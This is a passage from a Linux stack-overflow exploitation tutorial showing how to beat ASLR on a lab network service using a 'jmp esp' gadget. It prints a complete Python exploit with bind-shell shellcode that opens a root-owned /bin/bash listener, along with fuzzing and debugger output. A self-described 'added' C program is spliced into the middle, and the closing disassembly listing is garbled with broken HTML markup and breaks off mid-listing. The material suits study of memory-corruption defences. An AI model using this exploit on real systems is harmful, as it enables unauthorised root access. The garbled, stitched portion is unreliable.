-rw-r--r-- 1 root root 93 Jul  7 22:02 secret.txt
root@host:/home/appuser# chmod 600 secret.txt
root@host:/home/appuser# ls -l secret.txt
-rw------- 1 root root 93 Jul  7 22:02 secret.txt
root@host:/home/appuser# cat secret.txt 
This is a top secret file!
Only people with the password should be able to view this file!
root@host:/home/appuser# echo "084934-3492048234728-4847847" > token
root@host:/home/appuser# ls -l token 
-rw-r--r-- 1 root root 29 Jul  7 22:03 token
root@host:/home/appuser# chmod 600 token 
root@host:/home/appuser# cat token 
084934-3492048234728-4847847
root@host:/home/appuser# su - appuser
appuser@host:~$ ls -l
total 20
-rwsr-xr-x 1 root root 8431 Jul  7 22:01 app-net
-rw------- 1 root root 93 Jul  7 22:02 secret.txt
-rw------- 1 root root 29 Jul  7 22:03 token
appuser@host:~$ cat secret.txt
cat: secret.txt: Permission denied
appuser@host:~$ cat token
cat: token: Permission denied
```

The big difference here is that we did not change the content of /proc/sys/kernel/randomize_va_space. If the value on your system is not 2, set it with: echo 2 > /proc/sys/kernel/randomize_va_space

This means that ASLR will be enabled (0 disables it, 1 randomizes the stack, mmap base and VDSO, and 2 additionally randomizes the brk heap). Note that ASLR only moves the regions the kernel and loader place at run time (stack, heap, shared libraries); the executable's own code and data stay at fixed addresses unless it was built as a position-independent executable, which the gcc command above does not ask for (a modern distribution's gcc may default to PIE, which changes that).
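The following is an added example and not part of the tutorial: a small program that reads its own /proc/self/maps, picks out the start of the stack, the heap and the C library, and prints them next to the address of a local variable and of main() so that two consecutive runs can be compared line by line. It assumes Linux (the /proc/PID/maps format) and that the C library's mapping path contains "libc"; the maps lines used to check the parser are constructed in the 32-bit layout this tutorial series targets, and all function and type names are my own.

```c
/* Added example: locate stack, heap and libc in /proc/self/maps so that the
 * effect of randomize_va_space can be seen across runs. Not the tutorial's code.
 * Assumes Linux; the libc mapping is found by the substring "libc" in its path. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <inttypes.h>

typedef struct {
	uint64_t start, end;
	char perms[5];
	char path[256];   /* "" for anonymous mappings */
} map_entry;

/* Parse one line of /proc/PID/maps, e.g.
 *   "bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]"
 * Returns 1 on success, 0 if the line is not in maps format. */
int parse_maps_line(const char *line, map_entry *e)
{
	unsigned long long start, end, offset;
	unsigned int major, minor;
	unsigned long inode;
	char perms[5];
	int consumed = 0;

	memset(e, 0, sizeof(*e));
	if (sscanf(line, "%llx-%llx %4s %llx %x:%x %lu%n",
	           &start, &end, perms, &offset, &major, &minor, &inode,
	           &consumed) != 7)
		return 0;
	e->start = start;
	e->end = end;
	strcpy(e->perms, perms);

	/* The path column is optional; skip the padding in front of it. */
	const char *p = line + consumed;
	while (*p == ' ' || *p == '\t')
		p++;
	size_t n = strcspn(p, "\n");
	if (n >= sizeof(e->path))
		n = sizeof(e->path) - 1;
	memcpy(e->path, p, n);
	e->path[n] = '\0';
	return 1;
}

/* Convenience wrappers over parse_maps_line() for one-off checks. */
uint64_t maps_line_start(const char *line)
{
	map_entry e;
	return parse_maps_line(line, &e) ? e.start : 0;
}

int maps_line_has_path(const char *line, const char *want)
{
	map_entry e;
	return parse_maps_line(line, &e) && strstr(e.path, want) != NULL;
}

/* Start address of the first mapping whose path contains `want`
 * ("[stack]", "[heap]", "libc", ...), or 0 if there is none. */
uint64_t find_mapping(const char *want)
{
	FILE *maps = fopen("/proc/self/maps", "r");
	char line[512];
	map_entry e;
	uint64_t found = 0;

	if (!maps)
		return 0;
	while (fgets(line, sizeof(line), maps)) {
		if (parse_maps_line(line, &e) && strstr(e.path, want)) {
			found = e.start;
			break;
		}
	}
	fclose(maps);
	return found;
}

int main(void)
{
	int local = 0;
	void *h = malloc(64);   /* make sure [heap] exists before we look for it */

	printf("stack  base 0x%" PRIx64 "  (a local is at %p)\n",
	       find_mapping("[stack]"), (void *)&local);
	printf("heap   base 0x%" PRIx64 "  (a malloc'd block is at %p)\n",
	       find_mapping("[heap]"), h);
	printf("libc   base 0x%" PRIx64 "\n", find_mapping("libc"));
	printf("main() is at %p\n", (void *)main);
	free(h);
	return 0;
}
```

Run it two or three times: with randomize_va_space set to 2 the stack, heap and libc bases change on every run, while main() stays put for a non-PIE binary. Set randomize_va_space to 0 and the three bases stop moving, which is the situation the earlier parts of this series relied on.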
We can prove this by looking at the memory map of a process over multiple executions:

```
appuser@host:~$ cat /proc/self/maps
08048000-08054000 r-xp 00000000 08:01 783374     /bin/cat
08054000-08055000 r--p 0000b000 08:01 783374     /bin/cat
08055000-08056000 rw-p 0000c000 08:01 783374     /bin/cat
0838a000-083ab000 rw-p 00000000 00:00 0          [heap]
b74e9000-b7528000 r--p 00000000 08:01 1066328    /usr/lib/locale/pap_AN/LC_CTYPE
b7528000-b7646000 r--p 00000000 08:01 1066368    /usr/lib/locale/pap_AN/LC_COLLATE
b7646000-b7647000 rw-p 00000000 00:00 0
b7647000-b77a4000 r-xp 00000000 08:01 1045302    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b77a4000-b77a5000 ---p 0015d000 08:01 1045302    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b77a5000-b77a7000 r--p 0015d000 08:01 1045302    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b77a7000-b77a8000 rw-p 0015f000 08:01 1045302    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b77a8000-b77ab000 rw-p 00000000 00:00 0
b77b7000-b77b8000 r--p 00000000 08:01 961741     /usr/lib/locale/[email protected]/LC_NUMERIC
b77b8000-b77b9000 r--p 00000000 08:01 962466     /usr/lib/locale/en_ZM/LC_TIME
b77b9000-b77ba000 r--p 00000000 08:01 962019     /usr/lib/locale/gv_GB.utf8/LC_MONETARY
b77ba000-b77bb000 r--p 00000000 08:01 1071064    /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES
b77bb000-b77bc000 r--p 00000000 08:01 1065713    /usr/lib/locale/sr_RS/LC_PAPER
b77bc000-b77bd000 r--p 00000000 08:01 962122     /usr/lib/locale/cy_GB.utf8/LC_NAME
b77bd000-b77be000 r--p 00000000 08:01 962015     /usr/lib/locale/gv_GB.utf8/LC_ADDRESS
b77be000-b77bf000 r--p 00000000 08:01 962121     /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE
b77bf000-b77c0000 r--p 00000000 08:01 1066122    /usr/lib/locale/sr_RS/LC_MEASUREMENT
b77c0000-b77c7000 r--s 00000000 08:01 827509     /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache
b77c7000-b77c8000 r--p 00000000 08:01 963555     /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION
b77c8000-b77ca000 rw-p 00000000 00:00 0
b77ca000-b77cb000 r-xp 00000000 00:00 0          [vdso]
b77cb000-b77e7000 r-xp 00000000 08:01 1062553    /lib/i386-linux-gnu/ld-2.13.so
b77e7000-b77e8000 r--p 0001b000 08:01 1062553    /lib/i386-linux-gnu/ld-2.13.so
b77e8000-b77e9000 rw-p 0001c000 08:01 1062553    /lib/i386-linux-gnu/ld-2.13.so
bfa32000-bfa53000 rw-p 00000000 00:00 0          [stack]
appuser@host:~$ cat /proc/self/maps
08048000-08054000 r-xp 00000000 08:01 783374     /bin/cat
08054000-08055000 r--p 0000b000 08:01 783374     /bin/cat
08055000-08056000 rw-p 0000c000 08:01 783374     /bin/cat
08dd9000-08dfa000 rw-p 00000000 00:00 0          [heap]
b74de000-b751d000 r--p 00000000 08:01 1066328    /usr/lib/locale/pap_AN/LC_CTYPE
b751d000-b763b000 r--p 00000000 08:01 1066368    /usr/lib/locale/pap_AN/LC_COLLATE
b763b000-b763c000 rw-p 00000000 00:00 0
b763c000-b7799000 r-xp 00000000 08:01 1045302    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7799000-b779a000 ---p 0015d000 08:01 1045302    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b779a000-b779c000 r--p 0015d000 08:01 1045302    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b779c000-b779d000 rw-p 0015f000 08:01 1045302    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b779d000-b77a0000 rw-p 00000000 00:00 0
b77ac000-b77ad000 r--p 00000000 08:01 961741     /usr/lib/locale/[email protected]/LC_NUMERIC
b77ad000-b77ae000 r--p 00000000 08:01 962466     /usr/lib/locale/en_ZM/LC_TIME
b77ae000-b77af000 r--p 00000000 08:01 962019     /usr/lib/locale/gv_GB.utf8/LC_MONETARY
b77af000-b77b0000 r--p 00000000 08:01 1071064    /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES
b77b0000-b77b1000 r--p 00000000 08:01 1065713    /usr/lib/locale/sr_RS/LC_PAPER
b77b1000-b77b2000 r--p 00000000 08:01 962122     /usr/lib/locale/cy_GB.utf8/LC_NAME
b77b2000-b77b3000 r--p 00000000 08:01 962015     /usr/lib/locale/gv_GB.utf8/LC_ADDRESS
b77b3000-b77b4000 r--p 00000000 08:01 962121     /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE
b77b4000-b77b5000 r--p 00000000 08:01 1066122    /usr/lib/locale/sr_RS/LC_MEASUREMENT
b77b5000-b77bc000 r--s 00000000 08:01 827509     /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache
b77bc000-b77bd000 r--p 00000000 08:01 963555     /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION
b77bd000-b77bf000 rw-p 00000000 00:00 0
b77bf000-b77c0000 r-xp 00000000 00:00 0          [vdso]
b77c0000-b77dc000 r-xp 00000000 08:01 1062553    /lib/i386-linux-gnu/ld-2.13.so
b77dc000-b77dd000 r--p 0001b000 08:01 1062553    /lib/i386-linux-gnu/ld-2.13.so
b77dd000-b77de000 rw-p 0001c000 08:01 1062553    /lib/i386-linux-gnu/ld-2.13.so
bfad4000-bfaf5000 rw-p 00000000 00:00 0          [stack]
appuser@host:~$ cat /proc/self/maps
08048000-08054000 r-xp 00000000 08:01 783374     /bin/cat
08054000-08055000 r--p 0000b000 08:01 783374     /bin/cat
08055000-08056000 rw-p 0000c000 08:01 783374     /bin/cat
09908000-09929000 rw-p 00000000 00:00 0          [heap]
b7435000-b7474000 r--p 00000000 08:01 1066328    /usr/lib/locale/pap_AN/LC_CTYPE
b7474000-b7592000 r--p 00000000 08:01 1066368    /usr/lib/locale/pap_AN/LC_COLLATE
b7592000-b7593000 rw-p 00000000 00:00 0
b7593000-b76f0000 r-xp 00000000 08:01 1045302    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b76f0000-b76f1000 ---p 0015d000 08:01 1045302    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b76f1000-b76f3000 r--p 0015d000 08:01 1045302    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b76f3000-b76f4000 rw-p 0015f000 08:01 1045302    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b76f4000-b76f7000 rw-p 00000000 00:00 0
b7703000-b7704000 r--p 00000000 08:01 961741     /usr/lib/locale/[email protected]/LC_NUMERIC
b7704000-b7705000 r--p 00000000 08:01 962466     /usr/lib/locale/en_ZM/LC_TIME
b7705000-b7706000 r--p 00000000 08:01 962019     /usr/lib/locale/gv_GB.utf8/LC_MONETARY
b7706000-b7707000 r--p 00000000 08:01 1071064    /usr/lib/locale/ne_NP/LC_MESSAGES/SYS_LC_MESSAGES
b7707000-b7708000 r--p 00000000 08:01 1065713    /usr/lib/locale/sr_RS/LC_PAPER
b7708000-b7709000 r--p 00000000 08:01 962122     /usr/lib/locale/cy_GB.utf8/LC_NAME
b7709000-b770a000 r--p 00000000 08:01 962015     /usr/lib/locale/gv_GB.utf8/LC_ADDRESS
b770a000-b770b000 r--p 00000000 08:01 962121     /usr/lib/locale/cy_GB.utf8/LC_TELEPHONE
b770b000-b770c000 r--p 00000000 08:01 1066122    /usr/lib/locale/sr_RS/LC_MEASUREMENT
b770c000-b7713000 r--s 00000000 08:01 827509     /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache
b7713000-b7714000 r--p 00000000 08:01 963555     /usr/lib/locale/en_GB.utf8/LC_IDENTIFICATION
b7714000-b7716000 rw-p 00000000 00:00 0
b7716000-b7717000 r-xp 00000000 00:00 0          [vdso]
b7717000-b7733000 r-xp 00000000 08:01 1062553    /lib/i386-linux-gnu/ld-2.13.so
b7733000-b7734000 r--p 0001b000 08:01 1062553    /lib/i386-linux-gnu/ld-2.13.so
b7734000-b7735000 rw-p 0001c000 08:01 1062553    /lib/i386-linux-gnu/ld-2.13.so
bfc79000-bfc9a000 rw-p 00000000 00:00 0          [stack]
```

This command displays the memory ranges of each memory segment inside the `cat` command's own virtual memory space.

As you can see, all of the memory segments change their ranges from run to run except for the top 3. These top 3 belong to the application binary itself (`/bin/cat` here), i.e. its actual code and data.

This means that we can only predict the memory addresses of the application's own code; nothing that is dynamically loaded or writable stays at a fixed address.

Every payload we have sent until now has been placed on the `stack`, which is the very last entry in the listing above. That region is not static, so we can no longer predict the address of our payload (the shellcode).

## Testing The App

```
appuser@host:~$ ./app-net
```

We already know a lot about this application, so let's try our exploit from last time:

```
appuser@host:~$ python app-net-fuzz.py
532
```

```
appuser@host:~$ gdb -q ./app-net
Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done.
(gdb) r
Starting program: /home/appuser/app-net
```

```
appuser@host:~$ python -c 'print "A"*532' | nc 127.0.0.1 9999
```

```
Program received signal SIGSEGV, Segmentation fault.
0x0804000a in ?? ()
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/appuser/app-net
```

```
appuser@host:~$ python -c 'print "A"*536' | nc 127.0.0.1 9999
```

```
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
```

```
appuser@host:~$ ./app-net
```

```
root@host:~# ps ax | grep app-net
26854 pts/0    S+     0:00 ./app-net
26951 pts/2    S+     0:00 grep app-net
root@host:~# gdb -q -p 26854
Attaching to process 26854
Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done.
Reading symbols from /lib/i386-linux-gnu/i686/cmov/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb77c0424 in __kernel_vsyscall ()
(gdb) c
Continuing.
```

```
appuser@host:~$ python -c 'print "A"*536' | nc 127.0.0.1 9999
```

```
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/20xw $esp
0xbfaeb670:     0xbfae000a      0xbfaeb694      0x000003e8      0x00000000
0xbfaeb680:     0xbfaeba80      0xbfaeba7c      0x000057a8      0x00000006
0xbfaeb690:     0x00001000      0x41414141      0x41414141      0x41414141
0xbfaeb6a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfaeb6b0:     0x41414141      0x41414141      0x41414141      0x41414141
```

```
appuser@host:~$ ./app-net
```

```
appuser@host:~$ cat app-net-exploit.py
#!/usr/bin/env python

import socket

shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80"

payload = "\x90" * 406 # (532 - 119) - 7 = 406

payload += shellcode # append our shellcode

payload += "\x90" * 7 # another 7 bytes

payload += "\x94\xb6\xae\xbf" # the address of our shellcode
                              # in reverse (little endian)

# create the tcp socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect to 127.0.0.1 port 9999
s.connect(("127.0.0.1", 9999))

# send our payload
s.send(payload)

# close the socket
s.close()
appuser@host:~$ python app-net-exploit.py
appuser@host:~$ nc 127.0.0.1 9998
nc: unable to connect to address 127.0.0.1, service 9998
```

As you can see, the exploit that we used last time didn't work. The reason is that the position of the stack has moved, so the shellcode isn't at the same address every time the application is launched.

The offset before we start overwriting EIP is 532. I want to explain quickly why this is.

We have 3 local variables, `char p[512];` (on line 100 of the source) and `int r, i;` (on line 101).

These variables go on to the stack in reverse order, so first (closest to the beginning of the [stack frame](https://en.wikipedia.org/wiki/Call_stack#Structure)) `i`, then `r` and lastly `p`.

When writes happen here they happen in the opposite direction, so a write at `p` will eventually overwrite `r` (after filling up the reserved space for `p`) and then `i`.

We are reserving 512 bytes for `p`, and each `int` is 4 bytes long, so that is 520. The stack has to be aligned to 16 byte boundaries, so we need to add another 8 bytes, making it 528 bytes.

Lastly, right below the local variables we have the saved EBP from the calling function, which is another 4 bytes. The return address is stored right after the saved EBP, so that takes us to 532 bytes.

## Returning From A Function

I explained this in much more detail in part [4](/x86-32-linux/reverse-engineering/2014/07/01/basic-binary-auditing/), but just before a function returns, the stack looks like this:

![stack just before the function returns](/assets/images/x86-32-linux/stack2.jpg)

The **RET ADDR** is what we are overwriting to take control of EIP.
What happens next is the strongRET ADDR/strong gets strongpopped/strong off of the stack into the EIP register and the stack then looks like this:/p pimg src="/assets/images/x86-32-linux/stack1.jpg" width="300"/p pThis means that the value of the ESP register will always point to the memory address on the stack right after we overwrite EIP, at 536 bytes into our payload (532 + 4 for EIP)./p pSo if we write our shellcode after we overwrite EIP then we know that ESP is pointing to it./p pAn instruction that is fairly common among all normal sized applications is codejmp esp/code. This instruction tells EIP to point to the address that ESP is pointing to./p pUsing this instruction we can execute our shellcode but first we have to find it in the application's a href="https://en.wikipedia.org/wiki/Code_segment" target="_blank"text segment/a because we know it will never change address if it is in this section./p h2Finding JMP ESP/h2 pFirst let's look at the disassembly using codeobjdump -d ./app-net -M intel/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span 
<pre><code>./app-net:     file format elf32-i386


Disassembly of section .init:

080485e0 &lt;_init&gt;:
 80485e0:   55                      push   ebp
 80485e1:   89 e5                   mov    ebp,esp
 80485e3:   53                      push   ebx
 80485e4:   83 ec 04                sub    esp,0x4
 80485e7:   e8 00 00 00 00          call   80485ec &lt;_init+0xc&gt;
 80485ec:   5b                      pop    ebx
 80485ed:   81 c3 14 0b 00 00       add    ebx,0xb14
 80485f3:   8b 93 fc ff ff ff       mov    edx,DWORD PTR [ebx-0x4]
 80485f9:   85 d2                   test   edx,edx
 80485fb:   74 05                   je     8048602 &lt;_init+0x22&gt;
 80485fd:   e8 ae 00 00 00          call   80486b0 &lt;[email protected]&gt;
 8048602:   58                      pop    eax
 8048603:   5b                      pop    ebx
 8048604:   c9                      leave
 8048605:   c3                      ret

Disassembly of section .plt:

08048610 &lt;[email protected]-0x10&gt;:
 8048610:   ff 35 04 91 04 08       push   DWORD PTR ds:0x8049104
 8048616:   ff 25 08 91 04 08       jmp    DWORD PTR ds:0x8049108
 804861c:   00 00                   add    BYTE PTR [eax],al
        ...

08048620 &lt;[email protected]&gt;:
 8048620:   ff 25 0c 91 04 08       jmp    DWORD PTR ds:0x804910c
 8048626:   68 00 00 00 00          push   0x0
 804862b:   e9 e0 ff ff ff          jmp    8048610 &lt;_init+0x30&gt;

08048630 &lt;[email protected]&gt;:
 8048630:   ff 25 10 91 04 08       jmp    DWORD PTR ds:0x8049110
 8048636:   68 08 00 00 00          push   0x8
 804863b:   e9 d0 ff ff ff          jmp    8048610 &lt;_init+0x30&gt;

08048640 &lt;[email protected]&gt;:
 8048640:   ff 25 14 91 04 08       jmp    DWORD PTR ds:0x8049114
 8048646:   68 10 00 00 00          push   0x10
 804864b:   e9 c0 ff ff ff          jmp    8048610 &lt;_init+0x30&gt;

08048650 &lt;[email protected]&gt;:
 8048650:   ff 25 18 91 04 08       jmp    DWORD PTR ds:0x8049118
 8048656:   68 18 00 00 00          push   0x18
 804865b:   e9 b0 ff ff ff          jmp    8048610 &lt;_init+0x30&gt;

08048660 &lt;[email protected]&gt;:
 8048660:   ff 25 1c 91 04 08       jmp    DWORD PTR ds:0x804911c
 8048666:   68 20 00 00 00          push   0x20
 804866b:   e9 a0 ff ff ff          jmp    8048610 &lt;_init+0x30&gt;

08048670 &lt;[email protected]&gt;:
 8048670:   ff 25 20 91 04 08       jmp    DWORD PTR ds:0x8049120
 8048676:   68 28 00 00 00          push   0x28
 804867b:   e9 90 ff ff ff          jmp    8048610 &lt;_init+0x30&gt;

08048680 &lt;[email protected]&gt;:
 8048680:   ff 25 24 91 04 08       jmp    DWORD PTR ds:0x8049124
 8048686:   68 30 00 00 00          push   0x30
 804868b:   e9 80 ff ff ff          jmp    8048610 &lt;_init+0x30&gt;

08048690 &lt;[email protected]&gt;:
 8048690:   ff 25 28 91 04 08       jmp    DWORD PTR ds:0x8049128
 8048696:   68 38 00 00 00          push   0x38
 804869b:   e9 70 ff ff
ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486a0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486a0: ff 25 2c 91 04 08 jmp DWORD PTR ds:0x804912c/span/span span class="code-line"span class="x" 80486a6: 68 40 00 00 00 push 0x40/span/span span class="code-line"span class="x" 80486ab: e9 60 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486b0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486b0: ff 25 30 91 04 08 jmp DWORD PTR ds:0x8049130/span/span span class="code-line"span class="x" 80486b6: 68 48 00 00 00 push 0x48/span/span span class="code-line"span class="x" 80486bb: e9 50 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486c0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486c0: ff 25 34 91 04 08 jmp DWORD PTR ds:0x8049134/span/span span class="code-line"span class="x" 80486c6: 68 50 00 00 00 push 0x50/span/span span class="code-line"span class="x" 80486cb: e9 40 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486d0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486d0: ff 25 38 91 04 08 jmp DWORD PTR ds:0x8049138/span/span span class="code-line"span class="x" 80486d6: 68 58 00 00 00 push 0x58/span/span span class="code-line"span class="x" 80486db: e9 30 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486e0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan 
class="p"gt;:/span/span span class="code-line"span class="x" 80486e0: ff 25 3c 91 04 08 jmp DWORD PTR ds:0x804913c/span/span span class="code-line"span class="x" 80486e6: 68 60 00 00 00 push 0x60/span/span span class="code-line"span class="x" 80486eb: e9 20 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486f0/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486f0: ff 25 40 91 04 08 jmp DWORD PTR ds:0x8049140/span/span span class="code-line"span class="x" 80486f6: 68 68 00 00 00 push 0x68/span/span span class="code-line"span class="x" 80486fb: e9 10 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048700/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048700: ff 25 44 91 04 08 jmp DWORD PTR ds:0x8049144/span/span span class="code-line"span class="x" 8048706: 68 70 00 00 00 push 0x70/span/span span class="code-line"span class="x" 804870b: e9 00 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048710/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048710: ff 25 48 91 04 08 jmp DWORD PTR ds:0x8049148/span/span span class="code-line"span class="x" 8048716: 68 78 00 00 00 push 0x78/span/span span class="code-line"span class="x" 804871b: e9 f0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048720/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048720: ff 25 4c 91 04 08 jmp DWORD PTR ds:0x804914c/span/span span class="code-line"span class="x" 8048726: 68 80 00 00 00 push 
0x80/span/span span class="code-line"span class="x" 804872b: e9 e0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048730/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048730: ff 25 50 91 04 08 jmp DWORD PTR ds:0x8049150/span/span span class="code-line"span class="x" 8048736: 68 88 00 00 00 push 0x88/span/span span class="code-line"span class="x" 804873b: e9 d0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048740/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048740: ff 25 54 91 04 08 jmp DWORD PTR ds:0x8049154/span/span span class="code-line"span class="x" 8048746: 68 90 00 00 00 push 0x90/span/span span class="code-line"span class="x" 804874b: e9 c0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048750/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048750: ff 25 58 91 04 08 jmp DWORD PTR ds:0x8049158/span/span span class="code-line"span class="x" 8048756: 68 98 00 00 00 push 0x98/span/span span class="code-line"span class="x" 804875b: e9 b0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048760/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048760: ff 25 5c 91 04 08 jmp DWORD PTR ds:0x804915c/span/span span class="code-line"span class="x" 8048766: 68 a0 00 00 00 push 0xa0/span/span span class="code-line"span class="x" 804876b: e9 a0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048770/span span 
class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048770: ff 25 60 91 04 08 jmp DWORD PTR ds:0x8049160/span/span span class="code-line"span class="x" 8048776: 68 a8 00 00 00 push 0xa8/span/span span class="code-line"span class="x" 804877b: e9 90 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".text/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048780/span span class="p"lt;/spanspan class="nf"_start/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048780: 31 ed xor ebp,ebp/span/span span class="code-line"span class="x" 8048782: 5e pop esi/span/span span class="code-line"span class="x" 8048783: 89 e1 mov ecx,esp/span/span span class="code-line"span class="x" 8048785: 83 e4 f0 and esp,0xfffffff0/span/span span class="code-line"span class="x" 8048788: 50 push eax/span/span span class="code-line"span class="x" 8048789: 54 push esp/span/span span class="code-line"span class="x" 804878a: 52 push edx/span/span span class="code-line"span class="x" 804878b: 68 00 8d 04 08 push 0x8048d00/span/span span class="code-line"span class="x" 8048790: 68 10 8d 04 08 push 0x8048d10/span/span span class="code-line"span class="x" 8048795: 51 push ecx/span/span span class="code-line"span class="x" 8048796: 56 push esi/span/span span class="code-line"span class="x" 8048797: 68 6c 88 04 08 push 0x804886c/span/span span class="code-line"span class="x" 804879c: e8 3f ff ff ff call 80486e0 lt;[email protected];/span/span span class="code-line"span class="x" 80487a1: f4 hlt /span/span span class="code-line"span class="x" 80487a2: 90 nop/span/span span class="code-line"span class="x" 80487a3: 90 nop/span/span span class="code-line"span class="x" 80487a4: 90 nop/span/span span class="code-line"span class="x" 80487a5: 90 nop/span/span span class="code-line"span 
